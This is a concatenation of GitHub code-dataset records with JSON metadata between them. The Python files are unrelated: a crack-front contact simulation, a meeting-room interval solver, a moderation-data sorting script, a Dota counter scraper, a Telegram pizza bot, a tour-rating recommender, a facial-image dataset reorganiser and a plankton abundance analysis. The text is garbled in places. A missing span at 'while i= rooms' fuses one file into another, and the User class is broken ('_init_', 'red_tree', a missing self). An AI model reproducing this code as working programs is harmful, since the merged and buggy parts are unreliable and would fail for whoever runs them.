\"nfev\",\"walltime\",\"displacement\", \"mean deformation\", \"force\",\"frac. area\", \"energy\"]\n main_logger.st(main_logger_headers,\n [i, sol.nit, sol.nfev, elapsed_time, displacement, mean_deformation, normal_force, rel_area, energy]\n )\n\n ncfile[i].pressures = force[halfspace.local_topography_subdomain_slices] / topography.area_per_pt\n\n if rel_area >= max_rel_area:\n mode = \"backward\"\n print(\"max contact area reached\")\n if mode == \"forward\":\n displacement += delta_d\n elif mode == \"backward\":\n displacement -= delta_d\n if contact_area == 0:\n print(\"left contact, stop here\")\n break\n\n i+=1\n\n finally:\n ncfile.close()\n endtime = time.time()\n print(\"elapsed time: {}\".\n format(endtime-absstarttime))\n\n\n\ndef simulate_CF_old():\n def kc(x, y):\n return k_topo_interp(x+0.5 * sx, y + 0.5 * sy, derivative=0)\n\n def dkc(x, y):\n interp_field, interp_derx, interp_dery = k_topo_interp(x+0.5 * sx, y+ 0.5 * sy, derivative=1)\n return interp_derx\n\n n = 128\n cf = SinewaveCrackFrontLoad(n=n, sy=sy, kc=kc, dkc=dkc)\n\n nc_CF = NCStructuredGrid(\"CF.nc\", \"w\", (n,))\n\n penetration = 0\n\n area = 0\n\n mean_pressures = np.concatenate((\n np.linspace(0, 0.3, 200, endpoint=False),\n np.linspace(0.3, -0.15, 200)\n ))\n\n # initial guess\n a = np.ones(2 * n) * JKR.contact_radius(mean_pressures[0], alpha)\n\n j = 0\n\n try:\n for mean_pressure in mean_pressures:\n print(f\"mean_pressure: {mean_pressure}\")\n sol = trustregion_newton_cg(\n x0=a, gradient=lambda a: cf.gradient(a, mean_pressure),\n hessian=lambda a: cf.hessian(a, mean_pressure),\n trust_radius=0.25 * np.min((np.min(a), fluctuation_length)),\n maxiter=3000,\n gtol=1e-6 # he has issues to reach the gtol at small values of a\n )\n print(sol.message)\n assert sol.success\n print(\"nit: {}\".format(sol.nit))\n a = sol.x\n n = int(len(a) / 2)\n a_left = a[:n]\n a_right = a[n:]\n # nc_CF[j].cm_sim_index = i\n nc_CF[j].a_left = a_left\n nc_CF[j].a_right = a_right\n nc_CF[j].mean_a_left = np.mean(a_left)\n nc_CF[j].mean_a_right = np.mean(a_right)\n nc_CF[j].mean_pressure = mean_pressure\n j = j + 1\n finally:\n nc_CF.close()\n\n\ndef direction_change_index(displacements):\n \"\"\"\n returns the index of the maximal displacements\n \"\"\"\n for i in range(0,len(displacements)):\n if displacements[i] > displacements[i+1]:\n return i\n\ndef kc(x, y):\n return k_topo_interp(x+0.5 * sx, y, derivative=0)\n\ndef dkc(x, y):\n interp_field, interp_derx, interp_dery = k_topo_interp(x+0.5 * sx, y, derivative=1)\n return interp_derx\n\nclass RadiusTooLowError(Exception):\n pass\n\nclass NegativeRadiusError(Exception):\n pass\n\ndef simulate_CF_following_CM(pausetime=0.00001, pulloff_a=1e-10, ):\n\n n = 128\n cf = SinewaveCrackFrontLoad(n=n, sy=sy, kc=kc, dkc=dkc)\n\n #TODO: implement hessian product\n P = 0.\n\n import scipy.optimize\n #print(scipy.optimize.check_grad(lambda a: gradient(a, P),\n # lambda a: hessian(a, P), x0=a))\n\n nc_CM = NCStructuredGrid(\"CM.nc\")\n nc_CF = NCStructuredGrid(\"CF.nc\", \"w\", (n, ) )\n\n import matplotlib.pyplot as plt\n\n fig, ax = plt.subplots()\n\n try:\n j = 0\n a = None # take care not to take a too small initial guess\n for i in np.concatenate(make_monotonic_load_indexes(nc_CM.displacement, nc_CM.mean_pressure))[1:]:\n print(\"CM frac contact area: {}\".format(nc_CM[i].contact_area / (sx * sy)))\n #if nc_CM[i].contact_area == 0:\n # continue\n #if nc_CM[i].mean_pressure <= 0:\n # if nc_CM[i].mean_pressure >= nc_CM[i-1].mean_pressure:\n # continue\n if nc_CM[i].displacement <= 0 and nc_CM[i].displacement >= nc_CM[i-1].displacement:\n continue\n\n a_left = np.max( ( 1/2 - x ) * nc_CM[i].contacting_points, axis=0)\n a_right = np.max( ( x - 1/2 ) * nc_CM[i].contacting_points, axis=0)\n ax.plot(nc_CM[i].mean_pressure, a_left[0], \"<\", c=\"b\")\n ax.plot(nc_CM[i].mean_pressure, a_right[0], \">\", c=\"r\" )\n plt.pause(pausetime)\n\n P = nc_CM[i].mean_pressure\n\n if a is None:\n a = np.ones(2 * n) * JKR.contact_radius(P, alpha)\n try:\n def gradient(radius):\n # TODO: this could be integrated directly in the crack\n # front class\n if np.min(radius) < 0:\n raise NegativeRadiusError\n if np.max(radius) < pulloff_a:\n raise RadiusTooLowError\n return cf.gradient(radius, P)\n sol = trustregion_newton_cg(x0=a, gradient=gradient,\n hessian=lambda a : cf.hessian(a, P),\n trust_radius=np.min((np.min(a) * 0.9, 0.25 * fluctuation_length)),\n maxiter=3000,\n gtol=1e-6 # he has issues to reach the gtol at small values of a\n )\n except RadiusTooLowError:\n if nc_CM[i].displacement >= nc_CM[i-1].displacement:\n print(\"CF still unstable\")\n continue\n else:\n print(\"lost contact\")\n break\n assert sol.success\n print(\"nit: {}\".format(sol.nit))\n a = sol.x\n n = int(len(a) / 2)\n a_left = a[:n]\n a_right = a[n:]\n nc_CF[j].cm_sim_index = i\n nc_CF[j].a_left = a_left\n nc_CF[j].a_right = a_right\n nc_CF[j].mean_a_left = np.mean(a_left)\n nc_CF[j].mean_a_right = np.mean(a_right)\n nc_CF[j].mean_pressure = P\n j = j+1\n ax.plot(nc_CM[i].mean_pressure, a_left[0], \"+\", c=\"b\" )\n ax.plot(nc_CM[i].mean_pressure, a_right[0], \"+\", c=\"r\" )\n plt.pause(pausetime)\n\n print(\"DONE\")\n finally:\n nc_CF.close()\n nc_CM.close()\n\n\n\ndef make_monotonic_load_indexes(displacements, load):\n r\"\"\"\n displacements: assumed to be first monotically increasing and then monotically decreasing\n\n returns a list of indexes where the load is increasing in the increasing sequence\n of displacements, and the load is decreasing in the decreasing sequence of displacements\n \"\"\"\n i_dirchange = direction_change_index(displacements)\n increasing_load_indexes = [0]\n for i in range(1, i_dirchange+1):\n if load[increasing_load_indexes[-1]] <= load[i]:\n increasing_load_indexes.append(i)\n\n decreasing_load_indexes = [i_dirchange-1]\n for i in range(i_dirchange, len(displacements)):\n if load[decreasing_load_indexes[-1]] >= load[i]:\n decreasing_load_indexes.append(i)\n\n return increasing_load_indexes, decreasing_load_indexes\n\ndef demo_make_monotonic_load_indexes():\n nc_CM = NCStructuredGrid(\"CM.nc\")\n fig, ax = plt.subplots()\n\n ax.plot(nc_CM.displacement, nc_CM.mean_pressure)\n increasing_load_indexes, decreasing_load_indexes = make_monotonic_load_indexes(nc_CM.displacement, nc_CM.mean_pressure)\n ax.plot(nc_CM.displacement[increasing_load_indexes], nc_CM.mean_pressure[increasing_load_indexes], \"o-\")\n ax.plot(nc_CM.displacement[decreasing_load_indexes], nc_CM.mean_pressure[decreasing_load_indexes], \"+-\")\n\n\ndef make_animation_both():\n import matplotlib.pyplot as plt\n from PythonBib.Plotting.utilitaires_plot import MidpointNormalize\n from matplotlib.animation import FuncAnimation\n max_stress = w / length_parameter\n pnorm = MidpointNormalize(vmin = - max_stress , vmax = max_stress)\n workcmap = plt.get_cmap(\"coolwarm\")\n topographycmap = plt.get_cmap(\"coolwarm\")\n from matplotlib.colors import LinearSegmentedColormap\n # plot contact\n\n contactcmap = LinearSegmentedColormap.from_list('contactcmap', ((1,1,1,0.),(1,1,1,0.3)), N=256)\n #plot presssures\n pressurecmap = LinearSegmentedColormap.from_list('testCmap', (\n (0.15294117647058825, 0.39215686274509803, 0.09803921568627451,1.),\n (1,1,1,0.6),\n (0.5568627450980392, 0.00392156862745098, 0.3215686274509804,1)), N=256)\n\n fig = plt.figure(figsize = (9, 3))\n nc_CM = NCStructuredGrid(\"CM.nc\")\n nc_CF = NCStructuredGrid(\"CF.nc\")\n\n x, y = topography.positions()\n zoom = False\n def animate(j):\n index = nc_CF[j].cm_sim_index\n fig.clear()\n ax = fig.add_subplot(111)\n ax.set_aspect(1)\n pressures = nc_CM.pressures[index, ...]\n\n workcmap = plt.get_cmap(\"coolwarm\")\n ax.imshow(w_topo.heights().T, cmap=workcmap)\n\n plt.colorbar(ax.imshow(pressures.T, norm=pnorm, cmap=pressurecmap))\n\n ax.set_title(r\"$P^*$=\" + f\"{nc_CM.mean_pressure[index]:.2e}\")\n\n #if with_contact_area:\n # contacting_points = pressures = nc.contacting_points[index]\n\n ax.invert_yaxis()\n\n ticks = np.linspace(-sx/2, (sx/2), 5)\n\n ax.set_xticks(ticks / sx * nx + nx * 0.5)\n ax.set_xticklabels([f\"{v:.2f}\" for v in ticks])\n\n ticks = np.linspace(-sy/2, sy/2, 5)\n ax.set_yticks(ticks / sy * ny + ny * 0.5)\n ax.set_yticklabels([f\"{v:.2f}\" for v in ticks])\n\n y_cf = np.arange(len(nc_CF[j].a_left)) * sy / len(nc_CF[j].a_left)\n ax.plot((0.5 - nc_CF[j].a_left) / sx * nx, y_cf / sy * ny, \"-k\")\n ax.plot((0.5 + nc_CF[j].a_right) / sx * nx, y_cf / sy * ny, \"-k\")\n\n FuncAnimation(fig, animate, frames=len(nc_CF), interval=50).save(\"both.mp4\")\n\n\nif __name__ == \"__main__\":\n\n a_min, a_infl, a_max = JKR._find_min_max_a(alpha = np.sqrt(np.min(w_topo.heights()) * 2 / np.pi))\n\n #simulate_CM()\n #simulate_CF_following_CM(pulloff_a=a_min)\n #make_animation_both()\n\n import matplotlib.pyplot as plt\n nc_CM = NCStructuredGrid(\"CM.nc\")\n nc_CF = NCStructuredGrid(\"CF.nc\")\n\n cx, cy = [s / 2 - s /n /2 for s, n in zip((sx, sy), (nx, ny))]\n x, y = topography.positions()\n\n a_left = np.max((1/2 - x) * nc_CM.contacting_points, axis=1)\n a_right = np.max(( x - 1/2 ) * nc_CM.contacting_points, axis=1)\n\n #indexes = np.concatenate(make_monotonic_load_indexes(nc_CM.displacement, nc_CM.mean_pressure))\n indexes = slice(None)\n\n fig, ax = plt.subplots()\n ax.plot(nc_CM.mean_pressure[indexes], np.max(a_left, axis=1)[indexes], label=\"CM, a left\")\n ax.plot(nc_CM.mean_pressure[indexes], np.max(a_right, axis=1)[indexes], label=\"CM, a right\")\n\n ax.plot(nc_CF.mean_pressure, np.max(nc_CF.a_left, axis=1), label=\"CF, a left\")\n ax.plot(nc_CF.mean_pressure, np.max(nc_CF.a_right, axis=1), label=\"CF, a right\")\n ax.legend()\n plt.show()","repo_name":"ContactEngineering/CrackFront","sub_path":"examples/sinewave_random.py","file_name":"sinewave_random.py","file_ext":"py","file_size_in_byte":17858,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"32231716544","text":"main=\"the quick brown brown fox jumped over the lazy dog. the dog slept over the verandah.\"\ni=0\ns=main.split()\na= \"over\"\nb= \" \"\nwhile i= rooms:\n need[i] = 1\n\n # 构造前缀和presums\n presums = [0 for _ in range(max_end + 2)]\n for i in range(max_end + 1):\n presums[i+1] = presums[i] + need[i]\n\n # 给定新的会议(a, b)问题就转化为,问[a, a+1, . . . , b−1]这些位置上的need是否都是0\n res = []\n for start, end in queries:\n if presums[end] == presums[start]: # [a, a+1, . . . , b−1]这些位置上的need是否都是0\n res.append(True)\n else:\n res.append(False)\n return res\n\n\n\n# 扫描线+前缀和精华版\n# 这道题之所以被称为精华版, 是因为这个题目把2种算法用到了极致。\n# \n# 首先, 开一个范围那么大的数组, 然后对于每个interval, mark一下不available。 也就是用了+1没用-1.\n# \n# 然后, 其实可以另外开一个数组, 等等再常数级别优化, 这个时候, 我们有了整个所有time的占用情况, 这个时候知道每个时间, 占用了几个。\n# \n# 然后我们根据占用情况, 反推出可用情况, 就是占用跟总房间去比。\n# \n# 然后妙的来啦, 怎么样在常数时间, 知道每个ask行不行呢?这里我们直接把available的时间标成1, 不available标成0. 然后再去算一个前缀和。 然后看一下前缀和和出来, 和区间长度比较, 如果区间里面都是1,那么加起来肯定等于区间长度。 那么这个题目答案就出来了\n\nclass Solution:\n \"\"\"\n @param intervals: the intervals\n @param rooms: the sum of rooms\n @param ask: the ask\n @return: true or false of each meeting\n \"\"\"\n def meetingRoomIII(self, intervals, rooms, asks):\n time = [0] * 500001\n for interval in intervals:\n time[interval[0]] += 1\n time[interval[1]] -= 1\n\n last = time[0]\n available = [0] * 500001\n available[0] = 1 if last < rooms else 0\n for i in range(1, len(available)):\n curr = last + time[i]\n if curr < rooms:\n available[i] = available[i - 1] + 1\n else:\n available[i] = available[i - 1]\n last = curr\n\n results = []\n for ask in asks:\n result = available[ask[1] - 1] - available[ask[0] - 1] >= ask[1] - ask[0]\n results.append(result)\n return results\n","repo_name":"boknowswiki/mytraning","sub_path":"lintcode/python/1897_meeting_room_III.py","file_name":"1897_meeting_room_III.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"228165155","text":"# -*- coding:utf-8 -*-\n\nimport json\nimport re\n\nimport jieba\n\n# 读取数据\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data.json', 'r', encoding='utf-8') as f:\n data = json.load(f)\n print(data[0])\n f.close()\n\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data_2.json', 'r', encoding='utf-8') as f:\n data_temp = json.load(f)\n print(data_temp[0])\n f.close()\n\ndata += data_temp\n\ncount_idle_error = 0\ncount_idle_error2 = 0\ncount_idle_error3 = 0\n\ndata2 = [] # 有敏感词\ndata3 = [] # 没有敏感词 【本身没有敏感词、因过滤单字和敏感词不成词而被过滤形成的敏感词】\ndata4 = [] # 没有敏感词 【本身没有敏感词】\ndata5 = [] # 没有敏感词 【因过滤单字和敏感词不成词而被过滤形成的敏感词】\ndata6 = [] # 没有敏感词 【过滤单字】\ndata7 = [] # 没有敏感词 【敏感词不成词】\nfor item in data:\n risks = item['risks']\n if item['feedback_type'] != 0: # 如果说人工审核过了\n words = []\n for risk in risks:\n words += risk['hit']\n cut = list(jieba.cut(item['text']))\n cutDic = {}\n for cutItem in cut:\n cutDic[cutItem] = 1\n # 此时的 words 中有一些词不是词,是由 空格 隔开的,需要分开,分开之后长度为 1 的词不考虑\n words2 = []\n enter = 0\n multiple_words = 0\n multiples = []\n for word in words:\n splits = word.split()\n for split in splits:\n enter = 1\n if len(split) > 1:\n multiple_words = 1 # 多字\n multiples.append(split)\n if split in cutDic.keys(): # 如果切分的词长度 > 1 并且 在结巴分词中\n words2.append(split)\n if len(words2) == 0: # 如果没有敏感词,不考虑,归到 data3 中\n temp = {\"text\": item['text'], 'label': item['feedback_type']}\n data3.append(temp)\n if enter == 0:\n data4.append(temp)\n else:\n if multiple_words == 0: # 单字\n data6.append(temp)\n else: # 多字,敏感词不成词\n temp['words'] = multiples\n data7.append(temp)\n data5.append(temp)\n if item['feedback_type'] == 99:\n if enter == 1:\n count_idle_error2 += 1\n count_idle_error += 1\n continue\n if item['feedback_type'] == 99:\n count_idle_error3 += 1\n temp = {\"text\": item['text'], 'words': words2, 'label': item['feedback_type']}\n data2.append(temp) # [{\"text\": \"hi hello\", \"words\": [\"hi\", \"hello\"], \"label\": 1}]\n# 写入 JSON 数据\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data2.json', 'w', encoding='utf-8') as f:\n json.dump(data2, f, ensure_ascii=False)\n f.close()\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data3.json', 'w', encoding='utf-8') as f:\n json.dump(data3, f, ensure_ascii=False)\n f.close()\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data4.json', 'w', encoding='utf-8') as f:\n json.dump(data4, f, ensure_ascii=False)\n f.close()\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data5.json', 'w', encoding='utf-8') as f:\n json.dump(data5, f, ensure_ascii=False)\n f.close()\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data6.json', 'w', encoding='utf-8') as f:\n json.dump(data6, f, ensure_ascii=False)\n f.close()\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data7.json', 'w', encoding='utf-8') as f:\n json.dump(data7, f, ensure_ascii=False)\n f.close()\n\nprint(count_idle_error3)\nprint(count_idle_error2)\n\nprint(count_idle_error)\n\n# 读取数据\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data2.json', 'r', encoding='utf-8') as f:\n data = json.load(f)\n f.close()\nfo = open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data3.txt', 'w', encoding='utf-8')\nfor d in data:\n line = str(d['label']) + '\\t' + str(d['words']) + '\\t' + d['text'] + '\\n'\n fo.write(line)\nfo.close()\n","repo_name":"baiyuting/ml","sub_path":"logistic/testExtract2.py","file_name":"testExtract2.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27033929014","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\n\ndef getHeroData(hero,date):\n #vars\n dates = ['week','month','3month','6month','year']\n\n #templar assassin -> templar-assasin\n heroLookup = hero.replace(' ','-')\n\n #WEB SCRAPING\n #request to dotabuff\n URL = 'https://www.dotabuff.com/heroes/' + heroLookup.lower() + '/counters?date=' + dates[date - 1]\n print(URL)\n headers = {\n 'User-Agent':'Mozilla/5.0'\n }\n page = requests.get(URL,headers=headers)\n\n soup = BeautifulSoup(page.content, 'html.parser')\n\n #grab sections\n content = soup.find_all('section', class_='counter-outline')\n\n td_arr = []\n\n #keep track of which pass this is\n #1 = disadvantages\n #2 = advantages\n x = 1\n\n #data will comprise of a mainHero and two arrays of heroes they counter/countered by\n data = {\"hero\":hero,\n \"counters\":[],\n \"countered\":[]}\n\n #for each section\n for elem in content:\n #HEADERS\n #1st pass: COUNTERED BY\n #2nd pass: COUNTERS\n\n #HEROES\n #counterhero comprises of a hero that the mainHero counters\n counterHero = {\"hero\":\"\",\n \"advantage\":\"\",\n \"winrate\":\"\"}\n\n #counteredHero comprises of a hero that counters the mainHero\n counteredHero = {\"hero\":\"\",\n \"disadvantage\":\"\",\n \"winrate\":\"\"}\n\n #get all the rows\n table = elem.find('tbody')\n rows = table.find_all('tr')\n #for each tr\n for tr in rows:\n #find all td\n td = tr.find_all('td')\n #for each td\n for value in td:\n td_arr.append(value.text)\n\n name = td_arr[1]\n percent = td_arr[2]\n winrate = td_arr[3]\n\n #x == 1 --> tracking countered by\n if x == 1:\n counteredHero = {\"hero\":name,\n \"disadvantage\":percent,\n \"winrate\":winrate}\n data['countered'].append(counteredHero)\n else:\n counterHero = {\"hero\":name,\n \"advantage\":percent,\n \"winrate\":winrate}\n data['counters'].append(counterHero)\n\n td_arr.clear()\n\n x += 1\n \n data = json.dumps(data)\n return data","repo_name":"clydeandersoniii/dota_scrub","sub_path":"dota.py","file_name":"dota.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74364745850","text":"from telegram.ext import *\nimport logging\nimport connection_dbpedia as dbpedia\nimport OWLconexion as owl\nimport PNL_Spacy as pln\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup\n\n\n\n# Set up the logging\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\nlogging.info('Starting Bot...')\n\n# Message error\n\n\ndef error(update, context):\n logging.error(f'Update {update} caused error {context.error}')\n\n# MENUS\n\ndef start_command(update, context):\n\n update.message.reply_text(\n 'Hola, yo soy Kin :\\n\\n te ayudara con tu Pedido')\n update.message.reply_text(\n text='Seleccione una opcion',\n reply_markup=InlineKeyboardMarkup([\n [InlineKeyboardButton(text='listPizzaDb', callback_data='listPizzaDb')],\n [InlineKeyboardButton(text='PizzaOWL', callback_data='PizzaOWL')],\n\n ])\n )\n update.message.reply_text(\n \"Procesamiento de PLN :\\n\"\n \"\\n/PLN -> Procesamiento de lenguaje natural\")\n\ndef types_command_dbpedia(update, context):\n qres = dbpedia.get_response_dbpedia_pizzas()\n for i in range(len(qres['results']['bindings'])):\n result = qres['results']['bindings'][i]\n name, ing, image_url = result['name']['value'], result['res']['value'], result['image']['value']\n mensaje ='Nombre de la pizza : ' + name + \"\\n Ingredientes: \" + ing +\"\\n\" + image_url\n update.callback_query.message.reply_text(mensaje)\n\n\ndef types_command_owl(update, context):\n qres = owl.get_response_pizzas()\n for i in range(len(qres['results']['bindings'])):\n result = qres['results']['bindings'][i]\n name = result['name']['value']\n qres2 = owl.get_response_ingredients(name)\n update.callback_query.message.reply_text('Nombre de la pizza : ' + name)\n update.callback_query.message.reply_text('ingredientes : ')\n for j in range(len(qres2['results']['bindings'])):\n result2 = qres2['results']['bindings'][j]\n name2 = result2['name']['value']\n update.callback_query.message.reply_text(name2)\n\n\ndef nlp_bot(update, context):\n update.message.reply_text(\"Ingresa un texto\")\n mytxt = update.message.text # obtener el texto que envio el usuario\n print(mytxt)\n doc = pln.spacy_info(mytxt)\n for w in doc:\n a = w.text, w.pos_\n update.message.reply_text(a)\n\n\nif __name__ == '__main__':\n\n updater = Updater(token=\"\", use_context=True)\n\n dp = updater.dispatcher\n\n # Commands\n\n dp.add_handler(CommandHandler('start', start_command))\n dp.add_handler(CallbackQueryHandler(pattern='listPizzaDb', callback=types_command_dbpedia))\n dp.add_handler(CallbackQueryHandler(pattern='PizzaOWL', callback=types_command_owl))\n dp.add_handler(MessageHandler(Filters.text, nlp_bot))\n\n # Messages\n\n # Log all errors\n dp.add_error_handler(error)\n\n # Run the bot\n updater.start_polling(1.0)\n updater.idle()\n\n","repo_name":"AndresAlvaradow/chat_bot_kin","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12343120853","text":"from sklearn import linear_model\r\nfrom sklearn.feature_extraction import DictVectorizer\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nfrom sklearn.ensemble import AdaBoostRegressor\r\nfrom sklearn.pipeline import Pipeline\r\n\r\nclass User(object):\r\n \"\"\"This class es used to store information about the users and do some data mining\"\"\"\r\n\r\n def _init_(self,name):\r\n self.name = name\r\n self.preferences = []\r\n self.ratings = {}\r\n self.history = []\r\n \r\n def get_tour_data(self, city_name = 'San_Francisco'):\r\n with open('Data/Tour_Data.json') as f:\r\n data = json.load(f)\r\n\r\n tour_data = []\r\n\r\n for tour in [tour for tour in data['features'] if tour['geometry']['type'] == 'multiPoint'] and tour['properties']['city'] == city_name:\r\n\r\n this_tour={'city' : tour['properties']['city'], 'rating' : tour['properties']['rating'], 'duration' : tour['properties']['duration'], 'start_time' : tour['properties']['start_time'] ,\r\n 'buss_names' : tour['properties']['buss_names'], 'buss_types' : tour['properties']['buss_types']}\r\n\r\n for buss_name in tour['properties']['buss_names']:\r\n this_tour[buss_name] = 1\r\n\r\n for buss_type in tour['properties']['buss_types'].keys():\r\n this_tour[buss_type] = tour['properties']['buss_types'][buss_type]\r\n\r\n tour_data.append(this_tour)\r\n\r\n return tour_data\r\n\r\n def predict(tour_data):\r\n\r\n vec = DictVectorizer()\r\n\r\n tour_data = get_tour_data()\r\n\r\n transformed = vec.fit_transform(tour_data).toarray()\r\n categories = vec.get_feature_names()\r\n\r\n y = transformed[:,[categories.index('rating')]]\r\n X = transformed[:,np.arange(transformed.shape[1])!=categories.index('rating')]\r\n\r\n reg_tree = DecisionTreeRegressor()\r\n\r\n addboost_tree = AdaBoostRegressor(DecisionTreeRegressor(max_depth=4),\r\n n_estimators=300, random_state=rng)\r\n\r\n red_tree.fit(X,y)\r\n addboost_tree(X,y)\r\n\r\n # Predict\r\n y_1 = red_tree.predict(X)\r\n y_2 = addboost_tree.predict(X)\r\n\r\n return prediction\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"alegde/OSTSP-Project","sub_path":"sample/User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6328759736","text":"import json\nimport shutil\nimport os\n\n\n# Read the original JSON file\nwith open('modified_image_metadata.json', 'r') as f:\n data = json.load(f)\n\n# Initialize a dictionary to store selected data\nselected_data = {}\n\n# Initialize dictionaries to keep track of images per subject-session combination\nimage_counter_high = {}\nimage_counter_low = {}\n\n# Iterate through each object in the original data\nfor key, value in data.items():\n # Check if the object has 'ckplus_emotion' or 'labelled_emotion' as \"happiness\"\n if value.get('ckplus_emotion') == 'happiness' or value.get('labelled_emotion') == 'happiness':\n subject_id = value['subject_id']\n session_id = value['session_id']\n image_id = int(value['image_id'])\n\n # Create a unique key for the subject-session combination\n combo_key = f\"{subject_id}_{session_id}\"\n\n # Update the image_counter dictionaries to keep track of the image_ids\n if combo_key not in image_counter_high:\n image_counter_high[combo_key] = []\n if combo_key not in image_counter_low:\n image_counter_low[combo_key] = []\n image_counter_high[combo_key].append(image_id)\n image_counter_low[combo_key].append(image_id)\n\n# Iterate through the image_counter dictionaries to select the top 5 and bottom 3 image_ids\nfor combo_key in image_counter_high.keys():\n top_image_ids = sorted(image_counter_high[combo_key], reverse=True)[:5]\n low_image_ids = sorted(image_counter_low[combo_key])[:3]\n\n # Collect the selected data\n selected_data[combo_key] = {\n \"happy_images\": [\n data[f\"{combo_key}_{str(image_id).zfill(8)}\"] for image_id in top_image_ids\n ],\n \"neutral_images\": [\n data[f\"{combo_key}_{str(image_id).zfill(8)}\"] for image_id in low_image_ids\n ]\n }\n\n# Write the selected data to a new JSON file\nwith open('newdataset_metadata.json', 'w') as f:\n json.dump(selected_data, f, indent=2)\n \n \n# formulate the new dataset\n\n# Path to the input JSON file\njson_file_path = 'newdataset_metadata.json'\n\n# Base directory for the new dataset\nbase_output_dir = 'C:\\\\Users\\\\samia\\\\Documents\\\\Thesis\\\\CK+\\\\new-Data'\n\n# Read the JSON file\nwith open(json_file_path, 'r') as f:\n data = json.load(f)\n\n# Iterate through each subject-session combination\nfor combo_key, images_data in data.items():\n subject_id = combo_key.split('_')[0]\n\n # Create subject's directory in the base output directory\n subject_output_dir = os.path.join(base_output_dir, subject_id)\n os.makedirs(subject_output_dir, exist_ok=True)\n\n # Iterate through each type of image (happy and neutral)\n for image_type, image_list in images_data.items():\n for image_data in image_list:\n image_path = image_data['image_path']\n image_filename = os.path.basename(image_path)\n image_emotion = image_data.get('ckplus_emotion', image_data.get('labelled_emotion'))\n\n source_image_path = os.path.join(\"C:\\\\Users\\\\samia\\\\Documents\\\\Thesis\\\\CK+\", image_path)\n\n if image_type == 'happy_images':\n image_output_dir = os.path.join(subject_output_dir, 'happy')\n else:\n image_output_dir = os.path.join(subject_output_dir, 'neutral')\n\n os.makedirs(image_output_dir, exist_ok=True)\n destination_image_path = os.path.join(image_output_dir, image_filename)\n\n # Copy the image to the appropriate subdirectory\n shutil.copy(source_image_path, destination_image_path)\n\nprint(\"Image copying completed.\")\n\n\n","repo_name":"Sheam1685/CK--Dataset-Metadata","sub_path":"formulate_newdataset.py","file_name":"formulate_newdataset.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43158875841","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport subprocess\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\nfrom mpl_toolkits.basemap import Basemap\nfrom matplotlib.colors import LogNorm\nimport seaborn as sns\n# with open('Tara_OTUs.fasta', 'w') as out:\n# for line in open('TaraOceansV9_globaldataset2009-2012_otus_v20161202.tsv'):\n# if line.startswith('cid'):\n# continue\n# line = line.split('\\t')\n# rec = SeqRecord(Seq(line[2]), id=\"OTU_{}\".format(line[0]), description=\"\")\n# SeqIO.write(rec, out, 'fasta')\n# \n# \n# cmd = \"\"\"/local/two/Software/vsearch-2.15.1/bin/vsearch --usearch_global \\ \n # Tara_OTUs.fasta --db Picozoa_18S_all_V9.fasta -iddef 1 --id 0.90 \\\n # --blast6out TARA_Picozoa_90.out\n# \"\"\"\n# subprocess.run(cmd.split())\n\npicozoa_otus = [line.split()[0] for line in open(\"TARA_Picozoa_90.out\")]\n\ndf = pd.read_csv('TaraOceansV9_globaldataset2009-2012_otus_v20161202.tsv', sep='\\t')\ndf['OTU'] = df['cid'].apply(lambda x: \"OTU_{}\".format(x))\ndf = df[df['OTU'].apply(lambda x: x in picozoa_otus)]\ndf.index = df['OTU']\ndf = df.drop(['pid', 'refs', 'lineage', 'taxogroup','rtotab', 'totab', 'cid', \n 'md5sum', 'sequence', 'OTU'], axis=1)\npico_abundance = df.sum()\n\ndf_all = pd.read_csv('TaraOceansV9_globaldataset2009-2012_otus_v20161202.tsv', sep='\\t')\ndf_all = df_all[df.columns]\nall_abundance = df_all.sum()\n\nenv = pd.read_csv('datasets/TARA_ENV_DEPTH_SENSORS.tab', sep='\\t', skiprows=2597)\nenv.index = env['Sample ID (TARA_barcode#, registered at ...)']\nenv = env[['Latitude', 'Longitude']]\n\ndef get_lat_lon(id, ll):\n try:\n return env.loc[id.split(',')[1], ll]\n except:\n print(id)\n return None\n\npico_rel = pico_abundance/all_abundance * 100\npico_rel = pd.DataFrame(pico_rel, columns=['Abundance'])\npico_rel['Latitude'] = pico_rel.index.map(lambda x: get_lat_lon(x, 'Latitude'))\npico_rel['Longitude'] = pico_rel.index.map(lambda x: get_lat_lon(x, 'Longitude'))\npico_rel = pico_rel.sort_values(by='Abundance')\npico_rel = 